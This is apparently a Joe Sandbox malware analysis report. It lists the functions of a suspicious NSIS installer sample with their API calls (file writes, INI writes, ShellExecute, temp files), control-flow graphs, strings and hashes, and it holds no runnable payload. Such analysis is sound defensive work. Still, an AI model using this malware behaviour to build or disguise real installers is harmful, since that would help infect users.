                                                      • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                                      • String ID:
                                                      • API String ID: 3376005127-0
                                                      • Opcode ID: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
                                                      • Instruction ID: 606d2f288e59f9406d2e88b5b0598c54d729d8d595f649ff0f3e4a994beab86c
                                                      • Opcode Fuzzy Hash: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
                                                      • Instruction Fuzzy Hash: 82115E72900109AFCF00EFA1DD45DAE7BB8EF04344F10403AFA09F61A1D7799A40DB19

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 782 402b23-402b37 GlobalAlloc 783 402b39-402b49 call 401446 782->783 784 402b4b-402b6a call 40145c WideCharToMultiByte lstrlenA 782->784 789 402b70-402b73 783->789 784->789 790 402b93 789->790 791 402b75-402b8d call 405f6a WriteFile 789->791 792 4030e3-4030f2 790->792 791->790 796 402384-40238d GlobalFree 791->796 796->792
                                                      APIs
                                                      • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                      • WideCharToMultiByte.KERNEL32(?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                      • lstrlenA.KERNEL32(?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                      • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                      • String ID:
                                                      • API String ID: 2568930968-0
                                                      • Opcode ID: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
                                                      • Instruction ID: 5d007b3c2ae3d1ce6b2586a1921c4ad46276280cee2e515d5d1d957ff8a092fa
                                                      • Opcode Fuzzy Hash: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
                                                      • Instruction Fuzzy Hash: 76016171500205FBDB14AF70DE48D9E3B78EF05359F10443AF646B91E1D6798982DB68

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 799 402713-40273b call 406009 * 2 804 402746-402749 799->804 805 40273d-402743 call 40145c 799->805 807 402755-402758 804->807 808 40274b-402752 call 40145c 804->808 805->804 809 402764-40278c call 40145c call 4062a3 WritePrivateProfileStringW 807->809 810 40275a-402761 call 40145c 807->810 808->807 810->809
                                                      APIs
                                                        • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                      • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                      Strings
                                                      • <RM>, xrefs: 00402713
                                                      • WriteINIStr: wrote [%s] %s=%s in %s, xrefs: 00402775
                                                      • TravelersDevelopingImpactsJewsInstructorOriginal, xrefs: 00402770
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: PrivateProfileStringWritelstrcpyn
                                                      • String ID: <RM>$TravelersDevelopingImpactsJewsInstructorOriginal$WriteINIStr: wrote [%s] %s=%s in %s
                                                      • API String ID: 247603264-163489428
                                                      • Opcode ID: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
                                                      • Instruction ID: 1675f45263e21dacb3bd3d3c28f4c469aa899418fcec56767b4290250f933745
                                                      • Opcode Fuzzy Hash: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
                                                      • Instruction Fuzzy Hash: 05014F70D40319BADB10BFA18D859AF7A78AF09304F10403FF11A761E3D7B80A408BAD

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 906 4021b5-40220b call 40145c * 4 call 404f72 ShellExecuteW 917 402223-4030f2 call 4062a3 906->917 918 40220d-40221b call 4062a3 906->918 918->917
                                                      APIs
                                                        • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                        • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                        • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                        • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                        • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                        • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                        • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                      • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004CB0B0,?), ref: 00402202
                                                        • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                        • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                      Strings
                                                      • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                      • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                                      • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                                      • API String ID: 3156913733-2180253247
                                                      • Opcode ID: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
                                                      • Instruction ID: bbc106df3db47d5a89d2587a4e22f40687ed87c50c6518a2742e337a88eb4af1
                                                      • Opcode Fuzzy Hash: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
                                                      • Instruction Fuzzy Hash: E001F7B2B4021476DB2077B69C87F6B2A5CDB41764B20047BF502F20E3E5BD88009139
                                                      APIs
                                                      • GetTickCount.KERNEL32 ref: 00405E9D
                                                      • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,004037FE,004D30C0,004D70C8), ref: 00405EB8
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: CountFileNameTempTick
                                                      • String ID: nsa
                                                      • API String ID: 1716503409-2209301699
                                                      • Opcode ID: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                                                      • Instruction ID: bbb7b3741c82bae03d84fc31e008e00914f4f4b6280f54d22115683b6c602e07
                                                      • Opcode Fuzzy Hash: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                                                      • Instruction Fuzzy Hash: 39F0F635600604BBDB00CF55DD05A9FBBBDEF90310F00803BE944E7140E6B09E00C798
                                                      APIs
                                                      • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                        • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                        • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                      • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: Window$EnableShowlstrlenwvsprintf
                                                      • String ID: HideWindow
                                                      • API String ID: 1249568736-780306582
                                                      • Opcode ID: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
                                                      • Instruction ID: bfe0de145d0e58e27592ef60cc9cda220d4f3e6bacb950e19a0f62fa040dbd34
                                                      • Opcode Fuzzy Hash: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
                                                      • Instruction Fuzzy Hash: F1E09232A05111DBCB08FBB5A74A5AE76B4EA9532A721007FE143F20D0DABD8D01C62D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
                                                      • Instruction ID: 5b61ba0e549d4a34e11b5feda41afe9ae6537485a044c30e59ebd23bda5797f4
                                                      • Opcode Fuzzy Hash: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
                                                      • Instruction Fuzzy Hash: BCA14771908248DBEF18CF28C8946AD3BB1FB44359F14812AFC56AB280D738E985DF85
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
                                                      • Instruction ID: 0868455ade8710e2db62ea7c97591ecaf8a07f5330254cde648c5a00cf1b77b0
                                                      • Opcode Fuzzy Hash: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
                                                      • Instruction Fuzzy Hash: 30912871908248DBEF14CF18C8947A93BB1FF44359F14812AFC5AAB291D738E985DF89
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
                                                      • Instruction ID: 3981f1dd08afc316d24d9ed5113be2a17ca7da729ed8f25fba603efd3ef4d826
                                                      • Opcode Fuzzy Hash: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
                                                      • Instruction Fuzzy Hash: 39815931908248DBEF14CF29C8446AE3BB1FF44355F10812AFC66AB291D778E985DF86
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
                                                      • Instruction ID: 01891581271c5a124b16634c3a8992e7a6857e255b4271240234ec945a90a24d
                                                      • Opcode Fuzzy Hash: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
                                                      • Instruction Fuzzy Hash: 73713571908248DBEF18CF28C894AAD3BF1FB44355F14812AFC56AB291D738E985DF85
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
